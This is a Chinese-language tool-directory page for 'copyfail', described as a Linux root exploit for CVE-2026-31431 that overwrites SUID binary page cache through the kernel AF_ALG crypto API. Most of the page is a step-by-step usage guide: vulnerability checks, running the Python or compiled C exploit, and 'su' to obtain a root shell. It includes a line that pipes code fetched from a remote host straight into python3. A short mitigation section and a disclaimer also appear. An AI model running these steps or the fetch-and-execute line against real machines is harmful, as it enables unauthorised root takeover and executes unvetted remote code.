Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
copyfail — Linux 本地权限提升漏洞利用,针对 CVE-2026-31431,通过 AF_ALG 内核加密 API 覆写 SUID 二进制文件的页缓存以获取 root 权限。 | Kitploit
工具/GitHubGitHub/minime794/copyfail
权限提升漏洞分析漏洞利用二进制利用
GitHubminime794/copyfail

copyfail

Linux 本地权限提升漏洞利用,针对 CVE-2026-31431,通过 AF_ALG 内核加密 API 覆写 SUID 二进制文件的页缓存以获取 root 权限。

查看仓库
6小时40分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Copy Fail (CVE-2026-31431) – 漏洞利用使用指南

原始 Readme 取自 @painoob

自 2017 / 2016 年以来的所有内核版本均存在漏洞!内核 7 完全免疫,其他版本(5-7 之间可能仍然存在漏洞)

⚠️ 免责声明

本内容仅供教育和授权安全测试使用。请勿在未经明确许可的系统上运行此内容。


📌 概述

Copy Fail (CVE-2026-31431) 是一个 Linux 本地权限提升(LPE)漏洞,通过 AF_ALG 影响内核加密 API。

它允许非特权用户覆盖 SUID 二进制文件(例如 /usr/bin/su)的页缓存数据,从而获得 root 访问权限。


🧠 要求

系统要求

  • Linux 内核(存在漏洞 – 取决于补丁状态)
  • 已启用 AF_ALG
  • 已加载 algif_aead 模块

Python 漏洞利用要求

  • Python 3.10+
  • 支持:
    • os.splice
    • socket(AF_ALG)

🔍 检查漏洞

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

预期指标:

  • authencesn(hmac(sha256),cbc(aes))
  • 已加载 algif_aead

🐍 运行 Python 漏洞利用

1. 直接执行

root@kitploit:~
python3 copy_fail_exp.py

2. 或通过 curl(如果远程托管)

root@kitploit:~
curl https://copy.fail/exp | python3

3. 触发 root shell

root@kitploit:~
su
id

预期结果:

root@kitploit:~
uid=0(root)

⚠️ 常见问题(Python)

❌ 错误:os.splice not found

原因:

  • Python 版本 < 3.10
  • 受限构建

解决方案:

  • 使用更新的 Python 二进制文件
  • 上传静态 Python 解释器

⚙️ 编译 C 版本

1. 编译

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. 使其可执行

root@kitploit:~
chmod +x copy_fail

3. 运行漏洞利用

root@kitploit:~
./copy_fail
su

⚠️ 常见问题(C)

❌ 漏洞利用运行但未获得 root

可能原因:

  • 内核已修补
  • 偏移量不正确
  • 环境不匹配

❌ 编译错误

安装所需工具:

root@kitploit:~
apt update && apt install build-essential

🧪 故障排除

检查系统是否已修补

root@kitploit:~
dmesg | grep -i alg

验证模块

root@kitploit:~
lsmod | grep algif_aead

🛡️ 缓解措施

禁用存在漏洞的模块

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

应用内核补丁

更新系统:

root@kitploit:~
apt update && apt upgrade

📌 注意事项

  • 漏洞利用仅修改页缓存(非持久性)
  • 需要本地访问权限
  • 默认情况下不可远程利用

🧠 最终见解

如果漏洞利用失败,请考虑:

  • 内核已修补
  • 环境限制
  • 其他权限提升途径(SUID、capabilities、sudo 配置错误)

📚 参考资料

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 作者说明

仅在实验室、CTF 和授权渗透测试中负责任地使用此漏洞利用。

下载工具